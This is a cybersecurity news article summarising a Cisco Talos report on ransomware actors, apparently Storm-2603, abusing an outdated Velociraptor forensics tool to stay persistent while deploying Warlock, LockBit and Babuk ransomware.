Cisco Talos has confirmed that ransomware operators are now abusing Velociraptor, an open-source digital forensics and incident response (DFIR) tool, in live ransomware campaigns.
“Ransomware operators are leveraging Velociraptor, an open-source DFIR tool that had not previously been definitively tied to ransomware incidents,” Talos stated in its latest threat intelligence report.
Velociraptor is designed to help defenders hunt threats, collect forensic data, and respond to incidents across Windows, Linux, and macOS systems. But in this case, attackers turned the tool against its intended purpose.
Talos observed the threat actors deploying an outdated version of Velociraptor (0.73.4.0) containing a privilege-escalation (CVE-2025-6264), which allowed arbitrary command execution and endpoint takeover.
The adversaries reportedly used Velociraptor to maintain stealthy persistence within compromised networks while executing additional payloads, including LockBit and Babuk ransomware. Talos notes that this capability “ensured the actors maintained stealthy persistent access while deploying LockBit and Babuk ransomware,” confirming how offensive repurposing of defensive tools has become a norm.
Cisco Talos attributes this campaign with moderate confidence to Storm-2603, a suspected China-based threat actor first linked to the exploitation of SharePoint known collectively as ToolShell.
The group’s operational fingerprint — from the use of Warlock, LockBit, and now Babuk ransomware to disabling Microsoft Defender protections and manipulating IIS components — matches previously documented tactics by Microsoft’s threat intelligence teams.
“Storm-2603 is known for deploying Warlock ransomware and LockBit ransomware in the same engagement,” Talos wrote. “It is highly unusual for actors to use two different ransomware variants in the same attack, increasing our confidence that this activity could be related to Storm-2603.”
The campaign, which unfolded in August 2025, combined Warlock, LockBit, and Babuk ransomware in one coordinated operation targeting VMware ESXi virtual machines and Windows servers. Victims faced severe operational disruption as the attackers encrypted both physical and virtual infrastructure, including vSphere-managed environments, while using Velociraptor for continuous control.
Even more unusually, Talos detected Babuk ransomware files, which the Storm-2603 group had never previously deployed, suggesting ongoing experimentation within their playbook.
The attackers deployed a fileless PowerShell encryptor that recursively targeted dozens of file extensions — from Office documents to source code — and appended extensions like “.xlockxlock” for Warlock and “.babyk” for Babuk.
Talos also discovered a PowerShell-based exfiltration script that uploaded stolen data to an attacker-controlled IP address (65.38.121[.]226) while suppressing activity logs using the “$ProgressPreference = ‘SilentlyContinue’” command — a tactic to avoid sandbox detection and endpoint telemetry.
“The addition of this tool in the ransomware playbook is in line with findings from Talos’ 2024 Year in Review, which highlights that threat actors are utilizing an increasing variety of commercial and open-source products,” the researchers added.
- Storm-2603: Chinese APT Deploys Warlock & LockBit with AK47C2 Framework
- Avast Unveils Updated Babuk Decryptor in Collaboration with Cisco Talos and Dutch Police
- Interlock RAT Gets PHP Makeover: New Variant Uses Steganography & ClickFix for Stealthy Infiltration
- RA World Ransomware: A Babuk Successor Targets Healthcare
- The AK47 Project: New Report Ties Storm-2603 to LockBit and Warlock Ransomware, SharePoint Exploits
